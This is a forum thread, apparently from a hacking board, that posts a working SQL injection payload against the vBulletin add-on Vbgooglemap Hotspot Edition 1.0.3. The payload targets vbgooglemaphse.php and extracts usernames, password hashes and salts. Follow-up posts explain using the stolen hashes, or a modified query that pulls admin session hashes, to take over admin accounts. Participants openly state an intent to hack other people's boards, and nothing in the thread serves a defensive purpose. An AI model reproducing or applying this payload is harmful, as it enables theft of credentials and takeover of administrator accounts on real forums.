Vbgooglemap Hotspot Edition <= 1.0.3 (vbulletin hack) SQL Injection

[.v0id]

###################################################
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
###################################################
# Keep This priv8 !

# Bug:

# [Target]/[Path]/vbgooglemaphse.php?do=showdetails&mapid=-1/**/UNION/**/SELECT/**/0,1,password,salt,username,5,6,7,8,9,10,11,12,13/**/FROM/**/user/*

###################################################
# Vbgooglemap Hotspot Edition 1.0.3 SQL INJECTION
###################################################

 

[SpeedRazors]

and how do i use this hack please explain what to do with this code above

 

[Morpheus]

This is an exploit in the hack Vbgooglemap Hotspot Edition 1.0.3, if you know how to use it you can hack some boards with it

 

[.v0id]

and how do i use this hack please explain what to do with this code above

It's a very simple SQL Injection hack; following code:

-1/**/UNION/**/SELECT/**/0,1,password,salt,username,5,6,7,8,9,10,11,12,13/**/FROM/**/user/*

pulls out the username, encoded password with salt from user with id 1

what you have to do next is to decode password with some tool and log in as admin.

what you could do is to pull out a session hash that would allow you to log in on the last admin session (if the session was allowed to go to admincp, then you have full access), however you need to change the query to get this.

 

[KrazyFire]

how to you hack vbulletin md5 hashes? was just wondering milw0rm.com does shit to vbulletin hashes

 

[Morpheus]

I cannot find how to decode vB MD5 hashes if you find sthing plz post it.

 

[KrazyFire]

.void tell me the cracker u use to crack passes lol i wanna hack someone

 

[Morpheus]

there is no password crackers for vb. passwrds are double hashed and almost impossible to find.